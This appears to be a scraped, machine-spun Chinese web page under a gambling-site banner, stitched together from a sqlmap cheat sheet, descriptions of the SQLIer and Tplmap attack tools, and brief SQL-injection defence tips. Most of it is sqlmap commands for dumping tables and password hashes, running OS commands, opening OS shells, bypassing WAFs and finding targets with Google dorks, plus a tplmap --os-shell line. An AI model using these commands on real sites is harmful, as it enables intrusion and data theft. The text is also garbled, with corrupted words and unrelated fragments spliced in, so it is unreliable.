>

巴黎人baliren登陆-巴黎人官网

–tables拆数据库表,命令插入到巴黎人官网 Web

- 编辑:巴黎人baliren登陆 -

–tables拆数据库表,命令插入到巴黎人官网 Web

./tplmap.py --os-shell -u <'指标网站'>

Sqlmap:

  • 相通注入流程:
  • sqlmap -u "www.ONDragon.com/ONDragon?id=1" --dbs   查看全部数据库

    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-db 查看当前数据库
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --user       查看数据库用户名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-user  查看当前用户名 
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --is-dba     判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" –privileges  判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --passwords  枚举密码哈希
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --tables -D database'name    获取数据库的表名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name --columns   获取数据库对应表的字段
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name -C column'name --dump  获取数据库对应表的字段的值   --dump-all  获取所有内容
    
  • -u (get型注入)

    sqlmap -u "www.ONDragon.com/?ONDragon=1"

  • --data (post型注入)

    sqlmap -u "www.ONDragon.com/ONDragon" --data="user=admin&pass=pass" sqlmap -r requests.txt 读取http包实行活动post注入(也足以步入http底部的轻巧地点注入,只要在注入地方投入 * 即可) sqlmap "www.ONDragon.com" --forms

  • --coockie (cookie注入)

    sqlmap -u "www.ONDragon.com/ONDragon" --cookie="user=admin&pass=pass" --level 2 (level 大于2就行)

  • --batch (自动选取sqlmap私下认可选项卡塔尔国

  • -p  (参数选取卡塔尔(قطر‎

    sqlmap -u "www.ONDragon.com" --forms -p admin

1.ACCESS数据库:

sqlmap.py -u “url” /*-u为正规扫描参数*/

sqlmap.py -u “url” –tables /*–tables拆数据库表*/

sqlmap.py -u “url” –columns -T “要拆的表名”/*列出钦点表名*/

sqlmap.py -u “url” –dump -T “要拆的表名”-C “要拆的字段名” /*–dump为拆毁字段名会保存在sqlmap/output目录下*/

2.MYSQL数据库:

sqlmap.py -u “url” /*扫描注入点*/

sqlmap.py -u “url” –dbs /*列出富有数据库*/

sqlmap.py -u “url” –current-db /*列出脚下数据库*/

sqlmap.py -u “url” –current-user /*列出当下顾客*/

sqlmap.py -u “url” –tables -D “当前数量库名” /*拆解当前数据库表*/

sqlmap.py -u “url” –columns -T “要拆得的表名” -D “当前多少库名” /*拆解钦定表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T “表名” -D “当前数据库”

3.SQLSERVER数据库:

sqlmap.py -u “url” /*环视注入点*/

sqlmap.py -u “url” –dbs /*列出装有数据库*/

sqlmap.py -u “url” –current-db /*列出脚下数据库*/

sqlmap.py -u “url” –current-user /*列出当下顾客*/

sqlmap.py -u “url” –tables -D “当前多少库名” /*拆解当前数量库表*/

sqlmap.py -u “url” –columns -T “要拆得的表名” -D “当前数据库名” /*拆解钦点表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T “表名” -D “当前数据库”

SQLSEHavalVEXC60操作和MYSQL是相似的!!!见怪不怪的二种数据库!!!

4.COOKIE注入:

sqlmap.py -u “www.xxx.com/asp或然www.xxx.com/php” –cookie “参数名如id=1” –level 2/*level为晋级权限*/

怎么数据库就依据上边的数据库加上cookie语句拆解就行了

5.POST注入:

抓包保存到SQLMAP目录下.txt的文书然后输入指令sqlmap.py -r xxx.txt /*xxx.txt为保存包文件的文件名”

sqlmap.py -u “url” –data “POST参数”

6.执行shell命令:

sqlmap.py -u “url” –os-cmd=”net user” /*执行net user命令*/

sqlmap.py -u “url” –os-shell /*系统相互的shell*/

7.注入HTTP请求 :

sqlmap.py -r xxx.txt –dbs /*xxx.txt内容为HTTP请求*/

8.绕过WAF的tamper插件使用:

sqlmap.py -u “url” –tamper “xxx.py”

sqlmap.py -u “url” –tamper=”xxx.py”

至于tamper脚本详细表达在本博客中有,链接为:

9.将注入语句插入到内定地方:

sqlmap.py -u “url(www.xxx.com/id/1*.html)” –dbs

某些网站是选取伪静态的页面使用SQLMAP的家常注入是特别的,所以SQLMAP提供了”*”参数将SQL语句插入内定地点,平时用来伪静态注入。

在行使HTTP注入时使用-r参数也足以间接在文书中增多*号

10.延时注入:

sqlmap –dbs -u “url” –delay 0.5 /*延时0.5秒*/

sqlmap –dbs -u “url” –safe-freq /*请求2次*/

11.应用谷歌(Google卡塔尔国语法寻找注入(谷歌(Google卡塔尔(英语:State of Qatar)hack卡塔尔(قطر‎:

sqlmap.py -g “inurl:asp?id=1” /*””内为搜索语法,如:inurl,intitle,site,filetype等等。


Options(选项):

–version 显示程序的版本号并脱离

-h, –help 突显此扶持音讯并脱离

-v VE帕杰罗Libratone 详细等级:0-6(默许为1)

Target(目标):

以下最少需求设置此中多个接收,设置目的URAV4L。

-d DIRECT 直接连接到数据库。

-u URL, –url=URL 目标URL。

-l LIST 从Burp或WebScarab代理的日记中剖析指标。

-r REQUESTFILE 从一个文件中载入HTTP央浼。

-g GOOGLEDO哈弗K 管理Googledork的结果作为对象U普拉多L。

-c CONFIGFILE 从INI配置文件中加载选项。

Request(请求):

这一个接受能够用来钦点怎样连接到目的UEnclaveL。

–data=DATA 通过POST发送的数额字符串

–cookie=COOKIE HTTP Cookie头

–cookie-urlencode URAV4L 编码生成的cookie注入

–drop-set-cookie 忽视响应的Set – Cookie头音讯

–user-agent=AGENT 指定 HTTP User – Agent头

–random-agent 使用随机选定的HTTP User – Agent头

–referer=REFERER 指定 HTTP Referer头

–headers=HEADE大切诺基S 换行分开,参预别的的HTTP头

–auth-type=ATYPE HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM卡塔尔(英语:State of Qatar)

–auth-cred=ACRED HTTP身份验证凭据(用户名:密码)

–auth-cert=ACERT HTTP认证证书(key_file,cert_file)

–proxy=PROXY 使用HTTP代理连接到目的URAV4L

–proxy-cred=PCRED HTTP代理身份验证凭据(顾客名:密码)

–ignore-proxy 忽视系统私下认可的HTTP代理

–delay=DELAY 在种种HTTP须要之间的延迟时间,单位为秒

–timeout=TIMEOUT 等待连接超时的时光(默以为30秒)

–retries=RETQashqaiIES 连接超时后再次连接的年月(默许3)

–scope=SCOPE 从所提供的代办日志中过滤器指标的正则表明式

–safe-url=SAFUOdysseyL 在测量试验进度中时常访谈的url地址

–safe-freq=SAFREQ 几回访谈之间测验央浼,给出安全的UTiguanL

Optimization(优化):

这一个选拔可用于优化SqlMap的特性。

-o 开启全部优化按键

–predict-output 预测管见所及的查询输出

–keep-alive 使用持久的HTTP(S)连接

–null-connection 从不曾实际的HTTP响应体中找找页面长度

–threads=THREADS 最大的HTTP(S)伏乞并发量(默认为1)

Injection(注入):

那么些接收能够用来钦赐测验哪些参数, 提供自定义的流入payloads和可选点窜脚本。

-p TESTPARAMETEOdyssey 可测验的参数(S)

–dbms=DBMS 强制后端的DBMS为此值

–os=OS 强制后端的DBMS操作系统为那个值

–prefix=PREFIX 注入payload字符串前缀

–suffix=SUFFIX 注入payload字符串后缀

–tamper=TAMPE揽胜极光使用给定的本子(S)点窜注入数据

Detection(检测):

那些选用能够用来钦点在SQL盲注时怎样深入分析和比较HTTP响应页面包车型大巴从头到尾的经过。

–level=LEVEL 推行测量检验的阶段(1-5,默以为1)

–risk=TiguanISK 实行测验的高危机(0-3,默以为1)

–string=STCR-VING 查询时有效时在页面相称字符串

–regexp=REGEXP 查询时有效时在页面相配正则表明式

–text-only 仅依据在文书内容比较网页

Techniques(技巧):

这几个接受可用于调度具体的SQL注入测量检验。

–technique=TECH SQL注入才具测量检验(暗中认可BEUST)

–time-sec=TIMESEC DBMS响应的延迟时间(默感觉5秒)

–union-cols=UCOLS 定列范围用于测验UNION查询注入

–union-char=UCHAKoleos用于暴力猜解列数的字符

Fingerprint(指纹):

-f, –fingerprint 实践检查布满的DBMS版本指纹

Enumeration(枚举):

那些选拔能够用来列举后端数据库管理种类的音信、表中的组织和数量。别的,您还足以运作您自身

的SQL语句。

-b, –banner 检索数据库管理体系的标志

–current-user 检索数据库管理体系当下顾客

–current-db 检索数据库管理体系当下数据库

–is-dba 检查实验DBMS当前客商是还是不是DBA

–users 枚举数据库管理种类顾客

–passwords 枚举数据库管理种类顾客密码哈希

–privileges 枚举数据库管理类别客户的权能

–roles 枚举数据库管理体系客户的剧中人物

–dbs 枚举数据库管理体系数据库

–tables 枚举的DBMS数据库中的表

–columns 枚举DBMS数据库表列

–dump 转储数据库处理体系的数据库中的表项

–dump-all 转储全部的DBMS数据库表中的条文

–search 搜索列(S),表(S)和/或数据库名称(S)

-D DB 要实行枚举的数目库名

-T TBL 要实行枚举的多少库表

-C COL 要拓宽枚举的数据库列

-U USEEscort 用来开展枚举的数据库客户

–exclude-sysdbs 枚举表时消灭系统数据库

–start=LIMITSTART 第叁个查询输出走入检索

–stop=LIMITSTOP 最终查询的输出步入检索

–first=FI凯雷德STCHAEscort第贰个查询输出字的字符检索

–last=LASTCHA景逸SUV最终查询的出口字字符检索

–sql-query=QUEHighlanderY 要实行的SQL语句

–sql-shell 提醒交互作用式SQL的shell

Brute force(蛮力):

那么些采用能够被用来运行蛮力检查。

–common-tables 检查存在合营表

–common-columns 检查存在合营列

User-defined function injection(顾客自定义函数注入):

那些选拔能够用来创设客商自定义函数。

–udf-inject 注入客商自定义函数

–shared-lib=SHLIB 分享库之处路线

File system access(采访文件系统):

这几个选取能够被用于访谈后端数据库管理体系的底层文件系统。

–file-read=TiggoFILE 从后端的数据库管理系统文件系统读取文件

–file-write=WFILE 编辑后端的数据库管理系统文件系统上之处文件

–file-dest=DFILE 后端的数据库管理类别写入文件的相对路线

Operating system access(操作系统访问):

那些接纳能够用来访问后端数据库管理连串的底部操作系统。

 

–os-cmd=OSCMD 实行操作系统命令

–os-shell 交互作用式的操作系统的shell

–os-pwn 获取贰个OOB shell,meterpreter或VNC

–os-smbrelay 风流倜傥键获取三个OOB shell,meterpreter或VNC

–os-bof 存储进程缓冲区溢出利用

–priv-esc 数据库进程客商权限提高

–msf-path=MSFPATH Metasploit Framework当地的设置路径

–tmp-path=TMPPATH 远程临时文件目录的相对路线

Windows注册表访谈:

那个选用能够被用于访谈后端数据库处理种类Windows注册表。

–reg-read 读叁个Windows注册表项值

–reg-add 写二个Windows注册表项值数据

–reg-del 删除Windows注册表键值

–reg-key=REGKEY Windows注册表键

–reg-value=REGVAL Windows注册表项值

–reg-data=REGDATA Windows登记表键值多少

–reg-type=REGTYPE Windows注册表项值类型

General(一般):

那几个选用能够用来设置有些相符的职业参数。

-t TRAFFICFILE 记录全数HTTP流量到多个文件文件中

-s SESSIONFILE 保存和苏醒检索会话文件的具有数据

–flush-session 刷新当前目的的对话文件

–fresh-queries 忽略在对话文件中存款和储蓄的查询结果

–eta 呈现每种输出的测度达到时刻

–update 更新SqlMap

–save file保存选项到INI配置文件

–batch 从不询问客户输入,使用具备暗中同意配置。

Miscellaneous(杂项):

–beep 发掘SQL注入时提示

–check-payload IDS对流入payloads的检查测量试验测量检验

–cleanup SqlMap具体的UDF和表清理DBMS

–forms 对目的USportageL的分析和测验格局

–gpage=GOOGLEPAGE 从内定的页码使用Googledork结果

–page-rank Googledork结果突显网页排行(PCRUISER)

–parse-errors 从响应页面剖判数据库管理系列的荒谬消息

–replicate 复制转储的数目到一个sqlite3数据库

–tor 使用私下认可的Tor(Vidalia/ Privoxy/ Polipo)代理地址

–wizard 给初级客商的简短向导分界面

二、     防御SQL注入攻击

对于易受攻击的对象操作系统,能够运用后面提到的中间一个参数重新运转tplmap命令。比如,我们能够透过以下措施将-os -shell选项与tplmap命令一齐使用。

 

2     SQLIer

SQLIer能够找到网址上一个有SQL注入漏洞的UMuranoL,并依赖有关音讯来变化利用SQL注入漏洞,但它不供给客商的相互影响。通过这种方法,它能够生成一个UNION SELECT查询,进而能够强力攻击数据库口令。这些程序在利用漏洞时并不选择引号,那代表它可适应两种网址。  

–tables拆数据库表,命令插入到巴黎人官网 Web 表单的输入域或页面请求参数的查询字符串中。SQLIer通过“true/false” SQL注入漏洞强力口令。依附于“true/false” SQL注入漏洞强力口令,顾客是爱莫能助从数据库查询数据的,只好查询贰个可回到“true”、“false”值的讲话。  

据总结,三个两个字符的口令(饱含十进制ASCII代码的别的字符)仅供给大概1分钟就能够破解。

2.1      其行使语法如下,sqlier [选项] [URL]

其选项如下: 

-c :[主机] 消除主机的狐狸尾巴使用新闻 

-s :[秒]在网页央求之间等待的秒数  

-u:[用户名]从数据库中强力攻击的客商名,用逗号隔断

-w:[选项]将[选项]交由wget

其余,此程序还扶植预计字段名,好似下两种选用:  

--table-names [报表名称]:可进展揣摸的表格名称,用逗号隔离

--user-田野先生s[顾客字段]:可進展推断的客商名字段名称,用逗号隔离

--pass-fields [口令字段]:可实行估计的口令字段名称,用逗号隔绝

Tplmap是叁个python工具,能够因而接纳沙箱转义本领找到代码注入和劳务器端模板注入(SSTI)漏洞。该工具可以在许多模板引擎中利用SSTI来访谈指标文件或操作系统。一些受支持的模版引擎满含PHP(代码评估),Ruby(代码评估),Jave(代码评估),Python(代码评估),ERB,Jinja2和Tornado。该工具得以推行对这么些模板引擎的盲注入,并富有执行长途命令的力量。

1.    对输入的数码实行过滤(过滤输入)

a卡塔尔(英语:State of Qatar)      对于动态布局SQL查询的场地,能够使用替换字符和删除特殊字符的办法。

b卡塔尔(قطر‎     检查顾客输入的合法性,幸免不法数据输入。数据检查应当在顾客端和劳动器端施行。推行服务器端验证,是为了弥补客商端验证机制的供应不能满足供给。

c卡塔尔国      节制表单或询问字符串输入的长度限定。

d卡塔尔(英语:State of Qatar)     加密客户登入名称、 密码等数据。

巴黎人官网 1

2.    对发送到数据库的数额进行转义(转义输出)

尽量利用为自定义数据库设计的转义函数。若无,使用函数addslashes(卡塔尔(قطر‎是相比较好的办法,对字符串型参数使用mysql_real_escape_string函数、对数字型参数使用intval,floatval函数强制过滤则更加好。当有着用于建设布局五个SQL 语句的数目被精确过滤和转义时,实际上也就幸免了 SQL注入的高危害。

可以因此采纳以下github链接从github存款和储蓄库克隆该工具来安装Tplmap。

三、     总结

除了那一个之外以上介绍的严防SQL注入攻击格局之外,还会有U宝马7系L重新恢复设置本事、页面静态化、屏蔽出错音信、使用web应用防火墙等方法。通过上述措施,SQL注入技术积谷防饥。

SQL(Structured Query Language)即构造化查询语言。SQL 注入,就是把 SQL 命令插入到 Web 表单的输入域或页...

原标题:Tplmap - 扫描服务器端模板注入漏洞的开源工具

生龙活虎、     SQL注入漏洞测量检验工具

Tplmap不独有选取了文件系统的露出马脚,并且还具有应用不相同参数访谈底层操作系统的本事。以下荧屏截图显示了可用来访问操作系统的不等参数选项

3.    参数化查询

参数化查询(Parameterized Query卡塔尔指的是 Web 程序在实行数据库查询时,在需提交数值或数额之处防止直接赋值,而是选拔参数来传递给值。

采取参数化查询技能,数据库服务器不会将参数的剧情就是 SQL 指令的一个组成都部队分来拍卖,在数据库系统产生对 SQL 指令的编写翻译后,再载入参数运营。因而,纵然参数中富含指令,也不会被数据库编写翻译运行。

本文由巴黎人-智能硬件发布,转载请注明来源:–tables拆数据库表,命令插入到巴黎人官网 Web